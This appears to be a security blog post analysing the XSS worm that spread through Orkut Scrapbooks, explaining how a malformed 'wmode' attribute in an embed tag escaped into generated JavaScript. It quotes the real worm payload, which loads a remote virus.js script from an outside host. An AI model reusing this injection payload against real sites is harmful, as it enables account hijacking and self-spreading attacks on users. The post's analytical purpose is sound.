I said in my previous post that the XSS flaw that caused the “infection” of about 660 000 Orkut profiles was probably present in the way Orkut parsed Flash objects.
Analysis of the worm showed that this is in fact the case. More specifically, there was a bug in the parsing of at least one of the attributes of the ‘embed’ HTML tag — a tag that was allowed by Orkut along with others. What follows are technical details.
The malicious code that the worm was sending to Orkut’s Scrapbook system was this one:
<embed src=”http://www.orkut.com/LoL.aspx” type=”application/x-shockwave-flash” wmode=\”transparent’); script=document.createElement(’script’);
script.src=’http://files.myopera.com/virusdoorkut/files/virus.js’;
document.getElementsByTagName(’head’)[0].appendChild(script); escape(’” width=”1″ height=”1″></embed>
This code is supposed to insert a Flash object. The malicious part starts after “wmode”. ‘transparent’ is a valid “wmode” attribute, but it’s not supposed to contain characters such as “);”. Google should have stripped this out of the existence. Why? Because Google transforms this HTML into a Javascript to insert the Flash object:
……..
var flashWriter = new _SWFObject(’http://www.orkut.com/LoL.aspx’, ‘521601098′, ‘1′, ‘1′, ‘9′, ‘#FFFFFF’, ‘autohigh’, ”, ”, ‘521601098′);
flashWriter._addParam(’wmode’, ‘transparent‘);
script=document.createElement(’script’);
script.src=’http://files.myopera.com/virusdoorkut/files/virus.js’;
document.getElementsByTagName(’head’)[0].appendChild(script); escape(”);
flashWriter._addParam(’allowNetworking’, ‘internal’);
………
What should have been stripped was inserted into the script. The part in bold effectively ended the call to the “addParam” function and gave free reign to the code responsible for running the worm (italics).
Any code or script could have been loaded by the attacker at this point. The file in Opera’s server is now giving a 403 Forbidden error and it’s the code of the worm. No other files were used.